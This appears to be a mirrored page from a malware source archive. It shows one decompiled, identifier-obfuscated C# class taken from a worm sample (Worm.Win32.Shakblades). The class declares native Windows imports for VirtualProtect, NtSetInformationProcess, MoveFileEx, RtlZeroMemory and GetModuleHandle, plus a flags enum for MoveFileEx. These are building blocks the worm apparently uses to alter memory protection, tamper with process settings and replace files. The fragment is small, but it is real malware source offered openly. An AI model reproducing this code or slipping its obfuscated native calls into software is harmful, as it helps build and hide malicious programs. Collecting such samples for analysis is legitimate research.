mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 11:26:11 +00:00
f2ac1ece55
add
45 lines
1.7 KiB
C#
45 lines
1.7 KiB
C#
// Decompiled with JetBrains decompiler
|
||
// Type: Ҧ߲๒ʽ໙ୄᴘ.٧Ѹ
|
||
// Assembly: dns-sd, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
||
// MVID: 4A42D535-5A92-4CC4-9677-40E6ACE36033
|
||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe
|
||
|
||
using System;
|
||
using System.Runtime.InteropServices;
|
||
|
||
namespace Ҧ߲๒ʽ໙ୄᴘ
|
||
{
|
||
internal class \u0667Ѹ
|
||
{
|
||
[DllImport("kernel32.dll", EntryPoint = "MoveFileEx", CharSet = CharSet.Unicode, SetLastError = true)]
|
||
public static extern bool \u1936\u0A50Ȁ\u0A84ᠬ\u1AE7(string ᡋત, string ᯌ, \u0667Ѹ.ቩᩬᐜ̯ṅडၿ ጆйἕછ);
|
||
|
||
[DllImport("kernel32.dll", EntryPoint = "VirtualProtect", SetLastError = true)]
|
||
public static extern bool \u171F\u1B67ΨƱࠏ(
|
||
IntPtr _param0,
|
||
uint _param1,
|
||
uint _param2,
|
||
out uint ҙᘐ);
|
||
|
||
[DllImport("Kernel32.dll", EntryPoint = "RtlZeroMemory")]
|
||
public static extern void \u0CC4\u1C9B\u1BFD(IntPtr _param0, IntPtr ԥྗ);
|
||
|
||
[DllImport("ntdll.dll", EntryPoint = "NtSetInformationProcess", SetLastError = true)]
|
||
public static extern int ଠঅྼ(IntPtr _param0, int _param1, ref int _param2, int ݯ);
|
||
|
||
[DllImport("kernel32.dll", EntryPoint = "GetModuleHandle", CharSet = CharSet.Auto)]
|
||
public static extern IntPtr \u1395้ỿ(string ǝᢴ);
|
||
|
||
[Flags]
|
||
public enum ቩᩬᐜ̯ṅडၿ
|
||
{
|
||
ʻᎠಊѝ = 1,
|
||
\u0DD6\u0B70ᤰႺʮᦽះ = 2,
|
||
ᑹ\u17FCנᒞ͍ሴǒ = 4,
|
||
Բዙຸ\u19FA\u1B69 = 8,
|
||
ଯ\u192Eψᜤ\u0DB2ᴿ\u0099 = 16, // 0x00000010
|
||
ᅮᒒᑖŹҒ\u0EFBᨬᆵᮖ = 32, // 0x00000020
|
||
}
|
||
}
|
||
}
|